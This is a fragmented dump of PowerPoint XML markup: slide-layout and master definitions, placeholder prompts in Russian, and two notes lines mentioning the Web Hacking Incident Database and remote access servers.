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62.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42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide17.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s/slide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+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s/slide25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide57.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s/slide35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+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s/slide54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide48.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Layouts/slideLayout12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+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s/slide59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/theme/theme4.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/slides/slide47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/theme/theme3.xml" ContentType="application/vnd.openxmlformats-officedocument.them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slides/slide44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/docProps/custom.xml" ContentType="application/vnd.openxmlformats-officedocument.custom-properties+xml"/>
  <Override PartName="/ppt/slides/slide6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/>
  <Override PartName="/ppt/slides/slide53.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/slides/slide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide4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60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/>
  <Override PartName="/ppt/slides/slide49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+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Override PartName="/ppt/slideLayouts/slideLayout18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+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 id="2147483661" r:id="rId2"/>
    <p:sldMasterId id="2147483674" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId70"/>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Lst>
  <p:sldSz cx="9144000" cy="6858000"/>
  <p:notesSz cx="9144000" cy="6858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theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme4.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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml" /><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml" /><Relationship Id="rId73"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sldImg" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="216000" y="812520"/>
            <a:ext cx="7127280" cy="4008960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для перемещения страницы щёлкните мышью</a:t>
            </a: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756000" y="5078520"/>
            <a:ext cx="6047640" cy="4811039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для правки формата примечаний щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 3" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="hdr" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;верхний колонтитул&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 4" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="dt" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4278960" y="0"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;дата/время&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="ftr" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="10157400"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;нижний колонтитул&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="PlaceHolder 6" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="sldNum" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4278960" y="10157400"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9075CFDB-CC4D-458E-BC8C-364B06595594}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>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sldImg" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4555800" cy="3416040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 2" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5028840" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90359" tIns="44280" rIns="90359" bIns="44280">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-216000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>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arn-CL" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Web Hacking Incident Database</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>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sldImg" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4555800" cy="3416040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 2" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5028840" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="-216000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>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2000" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>RAS – Remote access server</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="" hidden="0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr isPhoto="0" userDrawn="0"/>
      </p:nvGrpSpPr>
      <p:grpSpPr bwMode="auto">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verTx" userDrawn="1">
  <p:cSld name="Title, Content over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822924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57200" y="3682080"/>
            <a:ext cx="822924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fourObj" userDrawn="1">
  <p:cSld name="Title, 4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457200" y="368208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8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4674240" y="368208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Title, 6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3239640" y="160452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6022080" y="160452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8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="368208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9" name="PlaceHolder 6" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3239640" y="368208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10" name="PlaceHolder 7" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6022080" y="368208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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="" hidden="0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr isPhoto="0" userDrawn="0"/>
      </p:nvGrpSpPr>
      <p:grpSpPr bwMode="auto">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x" userDrawn="1">
  <p:cSld name="Title Slide">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subTitle" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8229240" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pP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822924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itle, 2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le Only">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nly" userDrawn="1">
  <p:cSld name="Centered Tex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subTitle" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="273600"/>
            <a:ext cx="8229240" cy="5307840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pP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AndObj" userDrawn="1">
  <p:cSld name="Title, 2 Content and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457200" y="368208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x" userDrawn="1">
  <p:cSld name="Title Slide">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subTitle" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8229240" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pP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AndTwoObj" userDrawn="1">
  <p:cSld name="Title Content and 2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4674240" y="368208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OverTx" userDrawn="1">
  <p:cSld name="Title, 2 Content over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457200" y="3682080"/>
            <a:ext cx="822924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verTx" userDrawn="1">
  <p:cSld name="Title, Content over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822924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57200" y="3682080"/>
            <a:ext cx="822924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fourObj" userDrawn="1">
  <p:cSld name="Title, 4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457200" y="368208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8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4674240" y="368208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Title, 6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3239640" y="160452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6022080" y="160452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8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="368208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9" name="PlaceHolder 6" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3239640" y="368208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10" name="PlaceHolder 7" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6022080" y="368208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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="" hidden="0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr isPhoto="0" userDrawn="0"/>
      </p:nvGrpSpPr>
      <p:grpSpPr bwMode="auto">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x" userDrawn="1">
  <p:cSld name="Title Slide">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subTitle" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8229240" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pP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822924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itle, 2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le Only">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822924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nly" userDrawn="1">
  <p:cSld name="Centered Tex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subTitle" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="273600"/>
            <a:ext cx="8229240" cy="5307840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pP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AndObj" userDrawn="1">
  <p:cSld name="Title, 2 Content and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457200" y="368208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AndTwoObj" userDrawn="1">
  <p:cSld name="Title Content and 2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4674240" y="368208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OverTx" userDrawn="1">
  <p:cSld name="Title, 2 Content over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457200" y="3682080"/>
            <a:ext cx="822924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verTx" userDrawn="1">
  <p:cSld name="Title, Content over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822924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57200" y="3682080"/>
            <a:ext cx="822924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fourObj" userDrawn="1">
  <p:cSld name="Title, 4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457200" y="368208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8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4674240" y="368208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Title, 6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3239640" y="160452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6022080" y="160452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8" name="PlaceHolder 5" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="368208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9" name="PlaceHolder 6" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3239640" y="368208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
        <p:nvSpPr>
          <p:cNvPr id="10" name="PlaceHolder 7" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6022080" y="3682080"/>
            <a:ext cx="2649600" cy="1896840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit fontScale="83000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="30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itle, 2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le Only">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nly" userDrawn="1">
  <p:cSld name="Centered Tex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subTitle" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="273600"/>
            <a:ext cx="8229240" cy="5307840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pP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AndObj" userDrawn="1">
  <p:cSld name="Title, 2 Content and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457200" y="368208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AndTwoObj" userDrawn="1">
  <p:cSld name="Title Content and 2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397728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4674240" y="368208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OverTx" userDrawn="1">
  <p:cSld name="Title, 2 Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="" hidden="0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr isPhoto="0" userDrawn="0"/>
      </p:nvGrpSpPr>
      <p:grpSpPr bwMode="auto">
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 1"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endParaRPr lang="en-GB" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 2" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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6" name="PlaceHolder 3" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4674240" y="1604520"/>
            <a:ext cx="401580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
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 4" hidden="0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr isPhoto="0" userDrawn="0">
            <p:ph type="body" hasCustomPrompt="0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3682080"/>
            <a:ext cx="8229240" cy="1896840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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s>
</file>

<file path=ppt/slideMasters/_rels/slideMaster3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><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3124080" y="6248520"/>
            <a:ext cx="2895120" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
